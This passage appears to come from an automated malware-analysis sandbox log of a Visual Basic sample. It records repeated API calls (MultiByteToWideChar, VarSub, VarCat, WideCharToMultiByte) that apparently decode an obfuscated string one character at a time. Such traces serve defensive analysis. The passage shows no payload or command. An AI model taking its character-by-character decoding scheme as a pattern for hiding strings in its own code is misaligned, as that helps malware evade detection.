lpUsedDefaultChar=0x0) returned 1 [0167.304] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.304] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.305] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.305] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.306] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.306] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.307] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.307] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.308] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.308] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.308] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.309] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.309] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.309] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.310] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0167.380] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.381] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.381] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.381] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0167.382] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.382] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.382] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.383] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.383] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.384] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.384] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.385] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.385] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.386] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.386] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.386] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.387] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.387] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.387] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.391] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0167.392] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.392] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.393] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.393] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.393] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.394] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.394] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.395] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.395] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.396] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.396] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.396] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.397] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.397] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.397] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.398] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.398] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.399] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0167.399] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.399] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.400] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.400] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.401] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.401] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.402] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.402] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.402] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.403] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.403] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.408] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0167.408] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.408] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.409] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.409] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.410] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.410] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.410] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.411] VarSub (in: pvarLeft=0x28f9e0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.411] VarCat (in: pvarLeft=0x28f940, pvarRight=0x28f920, pvarResult=0x28f848 | out: pvarResult=0x28f848) 